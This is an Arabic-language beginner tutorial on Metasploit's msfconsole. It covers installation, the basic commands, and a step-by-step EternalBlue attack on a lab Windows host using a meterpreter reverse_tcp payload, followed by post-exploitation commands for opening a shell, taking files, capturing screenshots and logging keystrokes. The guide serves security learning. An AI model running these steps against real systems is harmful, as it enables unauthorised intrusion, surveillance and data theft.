شنو هي Msfconsole؟
هي الواجهة التفاعلية الرئيسية لـ Metasploit Framework. تخليك تتحكم بكل إمكانيات ميتاسبلويت من مكان واحد، تكدر تبحث عن ثغرات، تسوي Exploit، ترفع Payload، تنشئ Session تحكم بالهدف، وتحلّل النتائج.
شنو الفائدة منها؟
- إذا انت باحث أمني: تكتشف الثغرات وتبلّغ عنها.
- إذا انت طالب أو مبتدئ: تتعلم شلون تشتغل الهجمات وتفهم شلون يصير الاختراق.
شلون نثبّت Msfconsole؟ 🔧
1. باستخدام Kali Linux :
إذا عندك Kali، فـ Metasploit موجود أصلًا، بس لازم تتأكد أنه محدث:
sudo apt update
sudo apt install metasploit-framework
2. على نظام Ubuntu أو Debian :
sudo apt update
sudo apt install curl gnupg2
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
chmod +x msfinstall
./msfinstall
3. على Windows :
- تنزل مثبت Metasploit من موقع Rapid7 الرسمي.
- تنصّبه مثل أي برنامج عادي.
- تفتح
msfconsole
من CMD.
4. على Termux (إذا عندك أندرويد)
pkg update && pkg upgrade
pkg install unstable-repo
pkg install metasploit
msfconsole
أول ما تفتح Msfconsole – شنو راح تشوف؟
تكتب بالأمر:
msfconsole
تكتب help
أو ?
يطلعلك كل الأوامر المتوفرة.

أوامر مهمة داخل Msfconsole :
الأمر | الوظيفة |
---|---|
search | تبحث عن ثغرات أو مودل |
use | تستخدم مودل معين (exploit أو auxiliary) |
info | تعرض معلومات مفصلة عن المودل |
set | تحدد قيم المتغيرات (مثل RHOST, RPORT, PAYLOAD) |
show payloads | تعرض أنواع البايلودات المتاحة |
exploit أو run | تشغل الهجوم |
مثال عملي: اختراق جهاز ويندوز وهمي بثغرة EternalBlue
1. شغل Msfconsole:
msfconsole
2. ابحث عن الثغرة:
search eternalblue
راح يطلعلك شي مثل:
exploit/windows/smb/ms17_010_eternalblue

3. استخدم المودل:
use exploit/windows/smb/ms17_010_eternalblue
4. اظهر البايلودات:
show payloads
نختار مثلاً:
windows/x64/meterpreter/reverse_tcp
5. نحدد الإعدادات:
بالبدية تشوف المطلوب منك:
show options
بعدها تحدد مثلاً :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.1.10 # عنوان الضحية
set LHOST 192.168.1.5 # جهازك
set LPORT 4444

6. شغّل الهجوم:
exploit
إذا الثغرة اشتغلت، راح تطلعلك جلسة meterpreter
، تكدر تدخل على النظام الهدف وتتحكم بيه.
أوامر Meterpreter ( بعد ما تدخل للـSession للضحية ):
الأمر | الوظيفة |
---|---|
sysinfo | معلومات عن النظام |
getuid | يظهر المستخدم الحالي |
shell | تفتح تيرمنال على جهاز الضحية |
download | تحميل ملفات من الجهاز الهدف |
upload | رفع ملفات إلى الجهاز الهدف |
screenshot | تاخذ لقطة شاشة |
keyscan_start / keyscan_dump | تسجل ضغطات لوحة المفاتيح |
أشياء روتينية تكدر تستعملها:
- دائمًا حدث الـ Metasploit حتى تحصل أحدث الثغرات:
msfupdate
- تكدر تكتب سكربتات automate للثغرات باستخدام
resource scripts
. - تكدر تستخدم
db_nmap
بدلnmap
العادي حتى تخزن النتائج داخل قاعدة بيانات Metasploit.